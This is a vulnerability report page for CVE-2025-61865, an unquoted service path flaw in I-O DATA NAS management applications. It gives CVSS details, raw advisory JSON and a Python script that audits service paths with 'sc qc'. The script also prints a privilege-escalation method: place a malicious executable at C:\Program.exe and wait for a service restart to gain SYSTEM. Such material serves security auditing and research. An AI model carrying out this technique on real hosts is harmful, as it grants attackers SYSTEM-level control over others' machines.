Security Vulnerability Report
CVE-2025-61865 CVSS 6.7 MEDIUM

CVE-2025-61865

Published: 2025-10-23 05:15:33
Last Modified: 2026-04-15 00:35:42

Description

Multiple NAS management applications provided by I-O DATA DEVICE, INC. register Windows services with unquoted file paths. A user with the write permission on the root directory of the system drive may execute arbitrary code with SYSTEM privilege.

CVSS Details

CVSS Score (v3.0; the raw JSON below also carries a CVSS 4.0 base score of 8.4, HIGH)
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

NarSuS App (version not specified)
Clone for Windows (version not specified)
I-O DATA NAS management applications (multiple versions affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
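#!/usr/bin/env python3
"""
CVE-2025-61865 PoC - Unquoted Service Path Privilege Escalation
Target: I-O DATA NAS Management Applications (NarSuS App, Clone for Windows)
Author: [email protected]

The script only reads service configuration with ``sc qc`` and prints what it
finds; it writes no file and changes no service.  Per the advisory text,
abusing the unquoted path requires write permission on the root directory of
the system drive.
"""

import os
import re
import sys
import time
import subprocess

# End of the executable image inside a service command line ("...\svc.exe -k x").
_EXE_SUFFIX = re.compile(r"\.exe\b", re.IGNORECASE)


def _query_service_config(service):
    """Return the text printed by ``sc qc <service>``."""
    result = subprocess.run(
        ["sc", "qc", service],
        capture_output=True,
        text=True,
        errors="replace",  # localized console output must not abort the audit
    )
    return result.stdout


def _is_unquoted_with_spaces(path):
    """Return True when the executable part of *path* is unquoted and has a space.

    Only the part up to the first ``.exe`` is examined, so a space that merely
    separates the executable from its arguments is not reported.  When no
    ``.exe`` is present the whole value is checked (conservative heuristic).
    """
    if path.startswith('"'):
        return False
    match = _EXE_SUFFIX.search(path)
    image = path[:match.end()] if match else path
    return " " in image


def check_unquoted_paths(services=None, query=None):
    """Check for unquoted service paths in affected applications.

    Args:
        services: Service names to inspect.  Defaults to the three names
            hard-coded in this listing.
        query: Callable taking a service name and returning the text of
            ``sc qc`` for it.  Defaults to running ``sc`` on the local host.

    Returns:
        A list of ``(service, path)`` tuples, one per BINARY_PATH_NAME value
        whose executable part is unquoted and contains a space.
    """
    if services is None:
        # NOTE(review): these names come from this listing, not from the
        # vendor advisories - confirm the real service names on an affected
        # host before treating "nothing found" as a clean result.
        services = [
            "NarSuS_UpdateService",
            "NarSuS_MonitorService",
            "CloneForWinService",
        ]
    if query is None:
        query = _query_service_config

    findings = []
    print("[*] Checking for unquoted service paths...")
    for service in services:
        try:
            output = query(service)
        except (OSError, subprocess.SubprocessError) as e:
            # e.g. ``sc`` is missing because this is not a Windows host.
            print(f"[-] Error checking {service}: {e}")
            continue

        if "BINARY_PATH_NAME" not in output:
            # Service not installed, or the query was refused.
            continue

        print(f"[+] Found service: {service}")
        for line in output.splitlines():
            if "BINARY_PATH_NAME" not in line:
                continue
            print(f" Path: {line.strip()}")
            # The value follows the first colon: "BINARY_PATH_NAME   : C:\...".
            path = line.partition(":")[2].strip()
            if _is_unquoted_with_spaces(path):
                print(" [!] VULNERABLE: Unquoted path with spaces detected!")
                findings.append((service, path))
    return findings


def create_payload(exploit_path):
    """Report the location that an unquoted service path leaves exposed.

    Despite its name, this function builds and writes nothing; it only prints
    *exploit_path* so the reader can see which location needs protecting.
    """
    print("[!] In real attack, malicious executable would be placed at:")
    print(f" {exploit_path}")
    print("[!] This file will be executed with SYSTEM privileges when service starts")


def main():
    """Run the service check, then print the issue summary and mitigation."""
    print("=" * 60)
    print("CVE-2025-61865 PoC - Unquoted Service Path")
    print("Target: I-O DATA NAS Management Applications")
    print("=" * 60)

    # Step 1: Identify vulnerable services
    check_unquoted_paths()

    # Step 2: Show the location the unquoted path exposes.
    # Example: for the unquoted service path
    #   C:\Program Files\I-O DATA\NarSuS\NarSuS_service.exe
    # Windows tries each space-delimited prefix as an executable, starting
    # with C:\Program.exe in the root of the system drive.
    print("\n[*] Exploitation strategy:")
    print(" 1. Identify unquoted service path containing spaces")
    print(" 2. Calculate intermediate path for exploitation")
    print(" 3. Place malicious executable at that path")
    print(" 4. Wait for service restart or system reboot")
    print(" 5. Gain SYSTEM privileges")

    # First space-separated word of the example path above.  Raw string so the
    # path is printed with single backslashes.
    exploit_path = r"C:\Program.exe"
    create_payload(exploit_path)

    # Defender checklist: install the vendor updates, make sure each service's
    # ImagePath value is wrapped in double quotes, and verify that
    # non-administrative accounts cannot create files in the root of the
    # system drive (the precondition named in the advisory).
    print("\n[*] Mitigation: Apply vendor patches or use quoted paths")


if __name__ == "__main__":
    main()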

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61865", "sourceIdentifier": "[email protected]", "published": "2025-10-23T05:15:32.743", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple NAS management applications provided by I-O DATA DEVICE, INC. register Windows services with unquoted file paths. A user with the write permission on the root directory of the system drive may execute arbitrary code with SYSTEM privilege."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN03295012/", "source": "[email protected]"}, {"url": "https://www.iodata.jp/support/information/2025/10_NarSuS_App/", "source": "[email protected]"}, {"url": "https://www.iodata.jp/support/information/2025/12_CloneforWindows/", "source": "[email protected]"}]}}